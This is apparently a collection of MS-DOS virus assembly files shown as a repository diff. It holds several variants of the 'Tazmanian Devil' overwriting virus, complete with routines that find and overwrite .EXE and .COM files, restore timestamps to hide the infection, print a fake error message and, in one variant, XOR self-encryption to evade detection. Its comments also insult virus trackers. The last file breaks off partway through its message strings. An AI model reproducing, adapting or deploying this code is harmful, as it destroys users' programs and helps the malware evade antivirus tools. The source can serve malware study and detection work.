mov ax,[bx]+datestamp ; Get the current file's data stamp
mov orig_date,ax ; Save it
mov dx,dta+filename ; Get the filename to change attribute
mov cx,0 ; Clear all attribute bytes
mov al,1 ; Set attribute sub-function
mov ah,43h ; Call DOS service to do it
int 21h
mov al,2 ; Set up to open handle for read/write
mov ah,3dh ; Open file handle DOS service
int 21h
mov handle,ax ; Save the file handle
mov bx,ax ; Transfer the handle to BX for read
mov cx,20 ; Read in the top 20 bytes of file
mov dx,offset compare_buf ; Use the small buffer up top
mov ah,3fh ; DOS read-from-handle service
int 21h
mov bx,offset compare_buf ; Adjust the encryption value
mov ah,encrypt_val ; for accurate comparison
mov [bx+6],ah
mov si,code_start ; One array to compare is this file
mov di,offset compare_buf ; The other array is the buffer
mov ax,ds ; Transfer the DS register...
mov es,ax ; ...to the ES register
cld
repe cmpsb ; Compare the buffer to the virus
jne healthy ; If different, the file is healthy!
call close_file ; Close it up otherwise
inc files_found ; Chalk up another fucked up file
continue_search:
mov ah,4fh ; Find next DOS function
int 21h ; Try to find another same type file
cmp ax,12h ; Are there any more files?
je no_more_found ; If not, get outta here
jmp find_healthy ; If so, try the process on this one!
no_more_found:
ret ; Go back to where we came from
healthy:
mov bx,handle ; Get the file handle
mov ah,3eh ; Close it for now
int 21h
mov ah,3dh ; Open it again, to reset it
mov dx,dta+filename
mov al,2
int 21h
mov handle,ax ; Save the handle again
call infect_file ; Infect the healthy file
call close_file ; Close down this operation
inc success ; Indicate we did something this time
dec files_infected ; Scratch off another file on agenda
jz exit_virus ; If we're through, terminate
jmp continue_search ; Otherwise, try another
ret
close_file:
mov bx,handle ; Get the file handle off the stack
mov cx,orig_time ; Get the date stamp
mov dx,orig_date ; Get the time stamp
mov al,1 ; Set file date/time sub-service
mov ah,57h ; Get/Set file date and time service
int 21h ; Call DOS
mov bx,handle
mov ah,3eh ; Close handle DOS service
int 21h
mov cx,orig_attr ; Get the file's original attribute
mov al,1 ; Instruct DOS to put it back there
mov dx,dta+filename ; Feed it the filename
mov ah,43h ; Call DOS
int 21h
ret
exit_virus:
cmp files_found,6 ; Are at least 6 files infected?
jl print_fake ; If not, keep a low profile
cmp success,0 ; Did we infect anything?
jg print_fake ; If so, cover it up
mov ah,09h ; Use DOS print string service
mov dx,offset virus_msg1 ; Load the address of the first line
int 21h ; Print it
mov dx,offset virus_msg2 ; Load the second line
int 21h ; (etc)
mov dx,offset virus_msg3
int 21h
mov dx,offset virus_msg4
int 21h
mov dx,offset virus_msg5
int 21h
mov dx,offset virus_msg6
int 21h
mov dx,offset virus_msg7
int 21h
mov dx,offset virus_msg8
int 21h
mov dx,offset virus_msg9
int 21h
mov dx,offset virus_msg10
int 21h
mov dx,offset virus_msg11
int 21h
mov dx,offset virus_msg12
int 21h
mov dx,offset virus_msg13
int 21h
mov dx,offset virus_msg14
int 21h
mov dx,offset virus_msg15
int 21h
mov dx,offset virus_msg16
int 21h
mov dx,offset virus_msg17
int 21h
mov dx,offset virus_msg18
int 21h
mov dx,offset virus_msg19
int 21h
mov dx,offset virus_msg20
int 21h
mov dx,offset virus_msg21
int 21h
mov dx,offset virus_msg22
int 21h
jmp terminate
print_fake:
mov ah,09h ; Use DOS to print fake error message
mov dx,offset fake_msg
int 21h
terminate:
mov ah,4ch ; DOS terminate process function
int 21h ; Call DOS to get out of this program
filler db 8 dup (90h) ; Pad out the file length to 666 bytes
main endp
code ends
end main

240
MSDOS/Virus.MSDOS.Unknown.taz-2208.asm Normal file
View File

@ -0,0 +1,240 @@
cr equ 13 ; Carriage return ASCII code
lf equ 10 ; Linefeed ASCII code
tab equ 9 ; Tab ASCII code
virus_size equ 562 ; Size of the virus file
code_start equ 100h ; Address right after PSP in memory
dta equ 80h ; Addr of default disk transfer area
datestamp equ 24 ; Offset in DTA of file's date stamp
timestamp equ 22 ; Offset in DTA of file's time stamp
filename equ 30 ; Offset in DTA of ASCIIZ filename
attribute equ 21 ; Offset in DTA of file attribute
code segment 'code' ; Open code segment
assume cs:code,ds:code ; One segment for both code & data
org code_start ; Start code image after PSP
main proc near ; Code execution begins here
jmp random_mutation ; Put the virus into action
encrypt_val db 00h ; Hold value to encrypt by here
infect_file:
mov bx,handle ; Get the handle
push bx ; Save it on the stack
pop bx ; Get back the handle
mov cx,virus_size ; Total number of bytes to write
mov dx,code_start ; Buffer where code starts in memory
mov ah,40h ; DOS write-to-handle service
int 21h ; Write the virus code into the file
ret ; Go back to where you came from
virus_code:
exe_filespec db "*.EXE",0
com_filespec db "*.COM",0
newdir db "..",0
fake_msg db cr,lf,"Error #2307 - Too big to fit in memory$"
virus_msg1 db cr,lf,tab," ÜÜÜßÜÛÛÛÜ $"
virus_msg2 db cr,lf,tab," ÜÛßÜßÛßÜßÛÛÜÛÜ $"
virus_msg3 db cr,lf,tab," ÜÛ ÛÛÝ ÛÛÝÞÛÛÛßÜÛÛÜÜÜ ÛÛÛÛÛ ÛÛ ÛÛÛÛÛ $"
virus_msg4 db cr,lf,tab," ßÛÛÜßßÛÝÞÛÛÝÞÛÛÝ ÛÛßÜÜÜÜßÛÜÜÜ Û Û Û Û $"
virus_msg5 db cr,lf,tab," ÜÛÛÛßßÛÜßÜßÝ ßß ÜÜÛÛÛÛÛÛ ÛÛÛÛßß Û ÛÛÛÛ Û $"
virus_msg6 db cr,lf,tab," ßÛÛßÜÛÛÜÜß ÜÜ ßÛÛÛßßßÛÛÛ ÛÛÛÛÜ Ü Û Û Û Û $"
virus_msg7 db cr,lf,tab," Ü ÛÞÝÞÛÜÜ ÜÛÜ ÜÛÛÛÛß ÜßÛÝÞÛÛÛÛÛÜÛÜ Û Û Û ÛÛÛÛÛ $"
virus_msg8 db cr,lf,tab," ÛÛÛÜÞÛ ÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛßÜßÜÛÛÛÛ ÛÛÛÛÛÛÛÛÛÜ $"
virus_msg9 db cr,lf,tab," ÛÛÛÛÛ ÛÛ ÛÛÛÛßÜÜ ÛÜßßßÜÜß ÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛ $"
virus_msg10 db cr,lf,tab," ÛÛÛÛÛÛÛ ÛÛ ÛÛÛÜßÝ ÛÛÛÛ Þß ÛÛÛÛÛÛÛ ÛÛßßÛÛÛÛÛÛÛÛÜ $"
virus_msg11 db cr,lf,tab," ÜÛÜßÛÛßßß ÛÛ ÛÛÛÛÜ ÛÛÛÛßÜÜÞÛÛÛÛÛÛÝÞÛÛ ÜÜÛÛÛÛÛÛÛÛÜ $"
virus_msg12 db cr,lf,tab," ÛÛÜÜÛÛÛÝ ÛÛ ÛÛÛÛ ÛßßßÞÛÝÛÛÛÛÛÛÛ ÛÛ ÛÛÛßÛÛÛÛÛÛÛÛÛÝ $"
virus_msg13 db cr,lf,tab," ÞÛÜßÛÛÛÛÛÛ ÛÜßÜÛÛ ÜÞÝÞÛ ÛÛßÛÛÛ ÛÛÝ ßß ÜÛÛÛÛÛÝßß $"
virus_msg14 db cr,lf,tab," ßßÜÛÜÜßß ßÞÛßÜÝÞÞÛÝÞÛÛÜß ÛßÜÛÛß ÛÛÛÝÞÛÛÛ $"
virus_msg15 db cr,lf,tab," ÜÛÛÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛÛÛÛÛÜ ÛÛÛÛÛÜ $"
virus_msg16 db cr,lf,tab," ßÛÛÛÛÛßßß ßßÛÛÛÛÛÛÛÛ ßÛÛÛÛÛÛÜ $"
virus_msg17 db cr,lf,tab," ÜÜÛÛÛÜÜ ßÛÛÛÛÜ ßßßßßßß ÜÛÛÛÛÛÛÛ $"
virus_msg18 db cr,lf,tab," ÜßÜÜÛÛÛÛÛÛÛÛÛÜÜÜÛÛÛÛÛÜ ÜÜÛÛÛÛÛÛßßÜÜÜÜÛÛÛÛÜÜ $"
virus_msg19 db cr,lf,tab,"ÜßÜÛÛßÜÜÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ßÛÛÛÛÛÛÜÜÛÛÛÛÛßßÛÛÛÛÜßÜ $"
virus_msg20 db cr,lf,tab," ÛÛÛÝÞÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛßßß ßßÛÛÛÛÛÛÛÛÛÛÛÛÜÜßÛÛÝÞ $"
virus_msg21 db cr,lf,tab," ßß ßÛÛÛÛÛßßßßßß ßßÛÛÛÛÛÛÛÛÛÛÛ ÛÛÝ $"
virus_msg22 db cr,lf,tab,"The Tazmanian Devil Virus (TAZ!) - Released 12-14-1992 - Sector Infector $"
compare_buf db 20 dup (?) ; Buffer to compare files in
files_found db ?
files_infected db ?
orig_time dw ?
orig_date dw ?
orig_attr dw ?
handle dw ?
success db ?
random_mutation: ; First decide if virus is to mutate
mov ah,2ch ; Set up DOS function to get time
int 21h
cmp encrypt_val,0 ; Is this a first-run virus copy?
je install_val ; If so, install whatever you get.
cmp dh,15 ; Is it less than 16 seconds?
jg find_extension ; If not, don't mutate this time
install_val:
cmp dl,0 ; Will we be encrypting using zero?
je random_mutation ; If so, get a new value.
mov encrypt_val,dl ; Otherwise, save the new value
find_extension: ; Locate file w/ valid extension
mov files_found,0 ; Count infected files found
mov files_infected,4 ; BX counts file infected so far
mov success,0
find_exe:
mov cx,00100111b ; Look for all flat file attributes
mov dx,offset exe_filespec ; Check for .EXE extension first
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je find_com ; If not, nothing more to do
call find_healthy ; Otherwise, try to find healthy .EXE
find_com:
mov cx,00100111b ; Look for all flat file attributes
mov dx,offset com_filespec ; Check for .COM extension now
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je chdir ; If not, step back a directory
call find_healthy ; Otherwise, try to find healthy .COM
chdir: ; Routine to step back one level
mov dx,offset newdir ; Load DX with address of pathname
mov ah,3bh ; Change directory DOS service
int 21h
dec files_infected ; This counts as infecting a file
jnz find_exe ; If we're still rolling, find another
jmp exit_virus ; Otherwise let's pack it up
find_healthy:
mov bx,dta ; Point BX to address of DTA
mov ax,[bx]+attribute ; Get the current file's attribute
mov orig_attr,ax ; Save it
mov ax,[bx]+timestamp ; Get the current file's time stamp
mov orig_time,ax ; Save it
mov ax,[bx]+datestamp ; Get the current file's data stamp
mov orig_date,ax ; Save it
mov dx,dta+filename ; Get the filename to change attribute
mov cx,0 ; Clear all attribute bytes
mov al,1 ; Set attribute sub-function
mov ah,43h ; Call DOS service to do it
int 21h
mov al,2 ; Set up to open handle for read/write
mov ah,3dh ; Open file handle DOS service
int 21h
mov handle,ax ; Save the file handle
mov bx,ax ; Transfer the handle to BX for read
mov cx,20 ; Read in the top 20 bytes of file
mov dx,offset compare_buf ; Use the small buffer up top
mov ah,3fh ; DOS read-from-handle service
int 21h
mov bx,offset compare_buf ; Adjust the encryption value
mov ah,encrypt_val ; for accurate comparison
mov [bx+6],ah
mov si,code_start ; One array to compare is this file
mov di,offset compare_buf ; The other array is the buffer
mov ax,ds ; Transfer the DS register...
mov es,ax ; ...to the ES register
cld
repe cmpsb ; Compare the buffer to the virus
jne healthy ; If different, the file is healthy!
call close_file ; Close it up otherwise
inc files_found ; Chalk up another fucked up file
continue_search:
mov ah,4fh ; Find next DOS function
int 21h ; Try to find another same type file
cmp ax,12h ; Are there any more files?
je no_more_found ; If not, get outta here
jmp find_healthy ; If so, try the process on this one!
no_more_found:
ret ; Go back to where we came from
healthy:
mov bx,handle ; Get the file handle
mov ah,3eh ; Close it for now
int 21h
mov ah,3dh ; Open it again, to reset it
mov dx,dta+filename
mov al,2
int 21h
mov handle,ax ; Save the handle again
call infect_file ; Infect the healthy file
call close_file ; Close down this operation
inc success ; Indicate we did something this time
dec files_infected ; Scratch off another file on agenda
jz exit_virus ; If we're through, terminate
jmp continue_search ; Otherwise, try another
ret
close_file:
mov bx,handle ; Get the file handle off the stack
mov cx,orig_time ; Get the date stamp
mov dx,orig_date ; Get the time stamp
mov al,1 ; Set file date/time sub-service
mov ah,57h ; Get/Set file date and time service
int 21h ; Call DOS
mov bx,handle
mov ah,3eh ; Close handle DOS service
int 21h
mov cx,orig_attr ; Get the file's original attribute
mov al,1 ; Instruct DOS to put it back there
mov dx,dta+filename ; Feed it the filename
mov ah,43h ; Call DOS
int 21h
ret
exit_virus:
cmp files_found,16 ; Are at least 16 files infected?
jl print_fake ; If not, keep a low profile
cmp success,0 ; Did we infect anything?
jg print_fake ; If so, cover it up
mov ah,09h ; Use DOS print string service
mov dx,offset virus_msg1 ; Load the address of the first line
int 21h ; Print it
mov dx,offset virus_msg2 ; Load the second line
int 21h ; (etc)
mov dx,offset virus_msg3
int 21h
mov dx,offset virus_msg4
int 21h
mov dx,offset virus_msg5
int 21h
mov dx,offset virus_msg6
int 21h
mov dx,offset virus_msg7
int 21h
mov dx,offset virus_msg8
int 21h
mov dx,offset virus_msg9
int 21h
mov dx,offset virus_msg10
int 21h
mov dx,offset virus_msg11
int 21h
mov dx,offset virus_msg12
int 21h
mov dx,offset virus_msg13
int 21h
mov dx,offset virus_msg14
int 21h
mov dx,offset virus_msg15
int 21h
mov dx,offset virus_msg16
int 21h
mov dx,offset virus_msg17
int 21h
mov dx,offset virus_msg18
int 21h
mov dx,offset virus_msg19
int 21h
mov dx,offset virus_msg20
int 21h
jmp terminate
print_fake:
mov ah,09h ; Use DOS to print fake error message
mov dx,offset fake_msg
int 21h
terminate:
mov ah,4ch ; DOS terminate process function
int 21h ; Call DOS to get out of this program
filler db 8 dup (90h) ; Pad out the file length to 666 bytes
main endp
code ends
end main

238
MSDOS/Virus.MSDOS.Unknown.taz-2209.asm Normal file
View File

@ -0,0 +1,238 @@
cr equ 13 ; Carriage return ASCII code
lf equ 10 ; Linefeed ASCII code
tab equ 9 ; Tab ASCII code
virus_size equ 2209 ; Size of the virus file
code_start equ 100h ; Address right after PSP in memory
dta equ 80h ; Addr of default disk transfer area
datestamp equ 24 ; Offset in DTA of file's date stamp
timestamp equ 22 ; Offset in DTA of file's time stamp
filename equ 30 ; Offset in DTA of ASCIIZ filename
attribute equ 21 ; Offset in DTA of file attribute
code segment 'code' ; Open code segment
assume cs:code,ds:code ; One segment for both code & data
org code_start ; Start code image after PSP
main proc near ; Code execution begins here
jmp random_mutation ; Put the virus into action
encrypt_val db 00h ; Hold value to encrypt by here
infect_file:
mov bx,handle ; Get the handle
push bx ; Save it on the stack
pop bx ; Get back the handle
mov cx,virus_size ; Total number of bytes to write
mov dx,code_start ; Buffer where code starts in memory
mov ah,40h ; DOS write-to-handle service
int 21h ; Write the virus code into the file
ret ; Go back to where you came from
virus_code:
exe_filespec db "*.EXE",0
com_filespec db "*.COM",0
newdir db "..",0
fake_msg db cr,lf,"Error #2307 - Too big to fit in memory$"
virus_msg1 db cr,lf,tab," ÜÜÜßÜÛÛÛÜ $"
virus_msg2 db cr,lf,tab," ÜÛßÜßÛßÜßÛÛÜÛÜ $"
virus_msg3 db cr,lf,tab," ÜÛ ÛÛÝ ÛÛÝÞÛÛÛßÜÛÛÜÜÜ ÛÛÛÛÛ ÛÛ ÛÛÛÛÛ $"
virus_msg4 db cr,lf,tab," ßÛÛÜßßÛÝÞÛÛÝÞÛÛÝ ÛÛßÜÜÜÜßÛÜÜÜ Û Û Û Û $"
virus_msg5 db cr,lf,tab," ÜÛÛÛßßÛÜßÜßÝ ßß ÜÜÛÛÛÛÛÛ ÛÛÛÛßß Û ÛÛÛÛ Û $"
virus_msg6 db cr,lf,tab," ßÛÛßÜÛÛÜÜß ÜÜ ßÛÛÛßßßÛÛÛ ÛÛÛÛÜ Ü Û Û Û Û $"
virus_msg7 db cr,lf,tab," Ü ÛÞÝÞÛÜÜ ÜÛÜ ÜÛÛÛÛß ÜßÛÝÞÛÛÛÛÛÜÛÜ Û Û Û ÛÛÛÛÛ $"
virus_msg8 db cr,lf,tab," ÛÛÛÜÞÛ ÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛßÜßÜÛÛÛÛ ÛÛÛÛÛÛÛÛÛÜ $"
virus_msg9 db cr,lf,tab," ÛÛÛÛÛ ÛÛ ÛÛÛÛßÜÜ ÛÜßßßÜÜß ÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛ $"
virus_msg10 db cr,lf,tab," ÛÛÛÛÛÛÛ ÛÛ ÛÛÛÜßÝ ÛÛÛÛ Þß ÛÛÛÛÛÛÛ ÛÛßßÛÛÛÛÛÛÛÛÜ $"
virus_msg11 db cr,lf,tab," ÜÛÜßÛÛßßß ÛÛ ÛÛÛÛÜ ÛÛÛÛßÜÜÞÛÛÛÛÛÛÝÞÛÛ ÜÜÛÛÛÛÛÛÛÛÜ $"
virus_msg12 db cr,lf,tab," ÛÛÜÜÛÛÛÝ ÛÛ ÛÛÛÛ ÛßßßÞÛÝÛÛÛÛÛÛÛ ÛÛ ÛÛÛßÛÛÛÛÛÛÛÛÛÝ $"
virus_msg13 db cr,lf,tab," ÞÛÜßÛÛÛÛÛÛ ÛÜßÜÛÛ ÜÞÝÞÛ ÛÛßÛÛÛ ÛÛÝ ßß ÜÛÛÛÛÛÝßß $"
virus_msg14 db cr,lf,tab," ßßÜÛÜÜßß ßÞÛßÜÝÞÞÛÝÞÛÛÜß ÛßÜÛÛß ÛÛÛÝÞÛÛÛ $"
virus_msg15 db cr,lf,tab," ÜÛÛÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛÛÛÛÛÜ ÛÛÛÛÛÜ $"
virus_msg16 db cr,lf,tab," ßÛÛÛÛÛßßß ßßÛÛÛÛÛÛÛÛ ßÛÛÛÛÛÛÜ $"
virus_msg17 db cr,lf,tab," ÜÜÛÛÛÜÜ ßÛÛÛÛÜ ßßßßßßß ÜÛÛÛÛÛÛÛ $"
virus_msg18 db cr,lf,tab," ÜßÜÜÛÛÛÛÛÛÛÛÛÜÜÜÛÛÛÛÛÜ ÜÜÛÛÛÛÛÛßßÜÜÜÜÛÛÛÛÜÜ $"
virus_msg19 db cr,lf,tab,"ÜßÜÛÛßÜÜÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ßÛÛÛÛÛÛÜÜÛÛÛÛÛßßÛÛÛÛÜßÜ $"
virus_msg20 db cr,lf,tab," ÛÛÛÝÞÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛßßß ßßÛÛÛÛÛÛÛÛÛÛÛÛÜÜßÛÛÝÞ $"
virus_msg21 db cr,lf,tab," ßß ßÛÛÛÛÛßßßßßß ßßÛÛÛÛÛÛÛÛÛÛÛ ÛÛÝ $"
virus_msg22 db cr,lf,tab,"The Tazmanian Devil Virus (TAZ!) - Released 12-14-1992 - Sector Infector $"
compare_buf db 20 dup (?) ; Buffer to compare files in
files_found db ?
files_infected db ?
orig_time dw ?
orig_date dw ?
orig_attr dw ?
handle dw ?
success db ?
random_mutation: ; First decide if virus is to mutate
mov ah,2ch ; Set up DOS function to get time
int 21h
cmp encrypt_val,0 ; Is this a first-run virus copy?
je install_val ; If so, install whatever you get.
cmp dh,30 ; Is it less than 30 seconds?
jg find_extension ; If not, don't mutate this time
install_val:
cmp dl,0 ; Will we be encrypting using zero?
je random_mutation ; If so, get a new value.
mov encrypt_val,dl ; Otherwise, save the new value
find_extension: ; Locate file w/ valid extension
mov files_found,0 ; Count infected files found
mov files_infected,4 ; BX counts file infected so far
mov success,0
find_exe:
mov cx,00100111b ; Look for all flat file attributes
mov dx,offset exe_filespec ; Check for .EXE extension first
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je find_com ; If not, nothing more to do
call find_healthy ; Otherwise, try to find healthy .EXE
find_com:
mov cx,00100111b ; Look for all flat file attributes
mov dx,offset com_filespec ; Check for .COM extension now
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je chdir ; If not, step back a directory
call find_healthy ; Otherwise, try to find healthy .COM
chdir: ; Routine to step back one level
mov dx,offset newdir ; Load DX with address of pathname
mov ah,3bh ; Change directory DOS service
int 21h
dec files_infected ; This counts as infecting a file
jnz find_exe ; If we're still rolling, find another
jmp exit_virus ; Otherwise let's pack it up
find_healthy:
mov bx,dta ; Point BX to address of DTA
mov ax,[bx]+attribute ; Get the current file's attribute
mov orig_attr,ax ; Save it
mov ax,[bx]+timestamp ; Get the current file's time stamp
mov orig_time,ax ; Save it
mov ax,[bx]+datestamp ; Get the current file's data stamp
mov orig_date,ax ; Save it
mov dx,dta+filename ; Get the filename to change attribute
mov cx,0 ; Clear all attribute bytes
mov al,1 ; Set attribute sub-function
mov ah,43h ; Call DOS service to do it
int 21h
mov al,2 ; Set up to open handle for read/write
mov ah,3dh ; Open file handle DOS service
int 21h
mov handle,ax ; Save the file handle
mov bx,ax ; Transfer the handle to BX for read
mov cx,20 ; Read in the top 20 bytes of file
mov dx,offset compare_buf ; Use the small buffer up top
mov ah,3fh ; DOS read-from-handle service
int 21h
mov bx,offset compare_buf ; Adjust the encryption value
mov ah,encrypt_val ; for accurate comparison
mov [bx+6],ah
mov si,code_start ; One array to compare is this file
mov di,offset compare_buf ; The other array is the buffer
mov ax,ds ; Transfer the DS register...
mov es,ax ; ...to the ES register
cld
repe cmpsb ; Compare the buffer to the virus
jne healthy ; If different, the file is healthy!
call close_file ; Close it up otherwise
inc files_found ; Chalk up another fucked up file
continue_search:
mov ah,4fh ; Find next DOS function
int 21h ; Try to find another same type file
cmp ax,12h ; Are there any more files?
je no_more_found ; If not, get outta here
jmp find_healthy ; If so, try the process on this one!
no_more_found:
ret ; Go back to where we came from
healthy:
mov bx,handle ; Get the file handle
mov ah,3eh ; Close it for now
int 21h
mov ah,3dh ; Open it again, to reset it
mov dx,dta+filename
mov al,2
int 21h
mov handle,ax ; Save the handle again
call infect_file ; Infect the healthy file
call close_file ; Close down this operation
inc success ; Indicate we did something this time
dec files_infected ; Scratch off another file on agenda
jz exit_virus ; If we're through, terminate
jmp continue_search ; Otherwise, try another
ret
close_file:
mov bx,handle ; Get the file handle off the stack
mov cx,orig_time ; Get the date stamp
mov dx,orig_date ; Get the time stamp
mov al,1 ; Set file date/time sub-service
mov ah,57h ; Get/Set file date and time service
int 21h ; Call DOS
mov bx,handle
mov ah,3eh ; Close handle DOS service
int 21h
mov cx,orig_attr ; Get the file's original attribute
mov al,1 ; Instruct DOS to put it back there
mov dx,dta+filename ; Feed it the filename
mov ah,43h ; Call DOS
int 21h
ret
exit_virus:
cmp files_found,2 ; Are at least 2 files infected?
jl print_fake ; If not, keep a low profile
cmp success,0 ; Did we infect anything?
jg print_fake ; If so, cover it up
mov ah,09h ; Use DOS print string service
mov dx,offset virus_msg1 ; Load the address of the first line
int 21h ; Print it
mov dx,offset virus_msg2 ; Load the second line
int 21h ; (etc)
mov dx,offset virus_msg3
int 21h
mov dx,offset virus_msg4
int 21h
mov dx,offset virus_msg5
int 21h
mov dx,offset virus_msg6
int 21h
mov dx,offset virus_msg7
int 21h
mov dx,offset virus_msg8
int 21h
mov dx,offset virus_msg9
int 21h
mov dx,offset virus_msg10
int 21h
mov dx,offset virus_msg11
int 21h
mov dx,offset virus_msg12
int 21h
mov dx,offset virus_msg13
int 21h
mov dx,offset virus_msg14
int 21h
mov dx,offset virus_msg15
int 21h
mov dx,offset virus_msg16
int 21h
mov dx,offset virus_msg17
int 21h
mov dx,offset virus_msg18
int 21h
mov dx,offset virus_msg19
int 21h
mov dx,offset virus_msg20
int 21h
jmp terminate
print_fake:
mov ah,09h ; Use DOS to print fake error message
mov dx,offset fake_msg
int 21h
terminate:
mov ah,4ch ; DOS terminate process function
int 21h ; Call DOS to get out of this program
main endp
code ends
end main

278
MSDOS/Virus.MSDOS.Unknown.taz-2276.asm Normal file
View File

@ -0,0 +1,278 @@
cr equ 13 ; This VIRUS was written 12-14-1992
lf equ 10 ; AND QUIT READING MY SOURCE CODE
tab equ 9 ; YOU SHITHEAD FUCKNOSE DOUCHE BAG
virus_size equ 2276 ; QUEERBAIT VIRUS TRACKER WANNA-BE!
code_start equ 100h ; Address right after PSP in memory
dta equ 80h ; Addr of default disk transfer area
datestamp equ 24 ; Offset in DTA of file's date stamp
timestamp equ 22 ; Offset in DTA of file's time stamp
filename equ 30 ; Offset in DTA of ASCIIZ filename
attribute equ 21 ; Offset in DTA of file attribute
code segment 'code' ; Open code segment
assume cs:code,ds:code ; One segment for both code & data
org code_start ; Start code image after PSP
;---------------------------------------------------------------------
; All executable code is contained in boundaries of procedure "main".
; The following code, until the start of "virus_code", is the non-
; encrypted CMT portion of the code to load up the real program.
;---------------------------------------------------------------------
main proc near ; Code execution begins here
call encrypt_decrypt ; Decrypt the real virus code
jmp random_mutation ; Put the virus into action
encrypt_val db 00h ; Hold value to encrypt by here
; ---------- Encrypt, save, and restore the virus code -----------
infect_file:
mov bx,handle ; Get the handle
push bx ; Save it on the stack
call encrypt_decrypt ; Encrypt most of the code
pop bx ; Get back the handle
mov cx,virus_size ; Total number of bytes to write
mov dx,code_start ; Buffer where code starts in memory
mov ah,40h ; DOS write-to-handle service
int 21h ; Write the virus code into the file
call encrypt_decrypt ; Restore the code as it was
ret ; Go back to where you came from
; --------------- Encrypt or decrypt the virus code ----------------
encrypt_decrypt:
mov bx,offset virus_code ; Get address to start encrypt/decrypt
xor_loop: ; Start cycle here
mov ah,[bx] ; Get the current byte
xor ah,encrypt_val ; Engage/disengage XOR scheme on it
mov [bx],ah ; Put it back where we got it
inc bx ; Move BX ahead a byte
cmp bx,offset virus_code+virus_size ; Are we at the end?
jle xor_loop ; If not, do another cycle
ret ; and go back where we came from
;-----------------------------------------------------------------------
; The rest of the code from here on remains encrypted until run-time,
; using a fundamental XOR technique that changes via CMT.
;-----------------------------------------------------------------------
virus_code:
;----------------------------------------------------------------------------
; All strings are kept here in the file, and automatically encrypted.
; Please don't be a lamer and change the strings and say you wrote a virus.
; Because of Cybernetic Mutation Technology(tm), the CRC of this file often
; changes, even when the strings stay the same.
;----------------------------------------------------------------------------
exe_filespec db "*.EXE",0
com_filespec db "*.COM",0
newdir db "..",0
fake_msg db cr,lf,"Program too big to fit in memory $"
virus_msg1 db cr,lf,"*TAKE THE DAY OFF COMPLIMENTS OF THE TAZMANIAN DEVIL AND Âô<C383> W<>sˆl!!* $"
virus_msg2 db cr,lf,"ADH ADH ADH ADH ADH ADHÜÜÜßÜÛÛÛÜADH ADH ADH ADH ADH ADH ADH ADH ADH ADH $"
virus_msg3 db cr,lf,"ADH ADH ADH ADH ADH AÜÛßÜßÛßÜßÛÛÜÛÜ ADH ADH ADH ADH ADH ADH ADH ADH ADH $"
virus_msg4 db cr,lf,"ADH ADH ADH ADH ADH ÜÛ ÛÛÝ ÛÛÝÞÛÛÛßÜÛÛÜÜÜDH ADH ADH ÛÛÛÛÛ ÛÛ ÛÛÛÛÛADH $"
virus_msg5 db cr,lf,"ADH ADH ADH ADßÛÛÜßßÛÝÞÛÛÝÞÛÛÝ ÛÛßÜÜÜÜßÛÜÜÜ ADH ADH ADÛ ADÛ AÛH ADÛ ADH $"
virus_msg6 db cr,lf,"ADH ADH ADH AÛÛÛÛßßÛÜßÜßÝ ßß ÜÜÛÛÛÛÛÛ ÛÛÛÛßßH ADH ADÛ ADÛÛÛÛH AÛH ADH $"
virus_msg7 db cr,lf,"ADH ADH ADH ßÛÛßÜÛÛÜÜß ÜÜ ßÛÛÛßßßÛÛÛ ÛÛÛÛÜ ÜADH ADÛ ADÛ AÛH ÛDH ADH $"
virus_msg8 db cr,lf,"ADH ADH ADHÜ ÛÞÝÞÛÜÜ ÜÛÜ ÜÛÛÛÛß ÜßÛÝÞÛÛÛÛÛÜÛÜH ADÛ ADÛ AÛHÛÛÛÛÛADH $"
virus_msg9 db cr,lf,"ADH ADH ADÛÛÛÜÞÛ ÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛßÜßÜÛÛÛÛ ÛÛÛÛÛÛÛÛÛÜADH ADH ADH ADH ADH $"
virus_msg10 db cr,lf,"ADH ADH AÛÛÛÛÛ ÛÛ ÛÛÛÛßÜÜ ÛÜßßßÜÜß ÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛDH ADH ADH ADH ADH $"
virus_msg11 db cr,lf,"ADH ADH ÛÛÛÛÛÛÛ ÛÛ ÛÛÛÜßÝ ÛÛÛÛ Þß ÛÛÛÛÛÛÛ ÛÛßßÛÛÛÛÛÛÛÛÜ ADH ADH ADH ADH$"
virus_msg12 db cr,lf,"ADH ADHÜÛÜßÛÛßßß ÛÛ ÛÛÛÛÜ ÛÛÛÛßÜÜÞÛÛÛÛÛÛÝÞÛÛAÜÜÛÛÛÛÛÛÛÛÜADH ADH ADH ADH$"
virus_msg13 db cr,lf,"ADH ADÛÛÜÜÛÛÛÝH ADÛÛ ÛÛÛÛ ÛßßßÞÛÝÛÛÛÛÛÛÛ ÛÛ ÛÛÛßÛÛÛÛÛÛÛÛÛÝH ADH ADH ADH$"
virus_msg14 db cr,lf,"ADH ADÞÛÜßÛÛÛÛÛÛADHÛÜßÜÛÛ ÜÞÝÞÛ ÛÛßÛÛÛ ÛÛÝ Aßß ÜÛÛÛÛÛÝßßDH ADH ADH ADH$"
virus_msg15 db cr,lf,"ADH ADHßßÜÛÜÜßß ADH ßÞÛßÜÝÞÞÛÝÞÛÛÜß ÛßÜÛÛßH ADHÛÛÛÝÞÛÛÛ ADH ADH ADH ADH$"
virus_msg16 db cr,lf,"ADH ADH ADH ADHÜÛÛÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛÛÛÛÛÜ ÛÛÛÛÛÜH ADH ADH ADH ADH AHD ADH$"
virus_msg17 db cr,lf,"ADH ADH ADH ADßÛÛÛÛÛßßß ADH ßßÛÛÛÛÛÛÛÛHßÛÛÛÛÛÛÜ ADH ADH ADH ADH ADH ADH$"
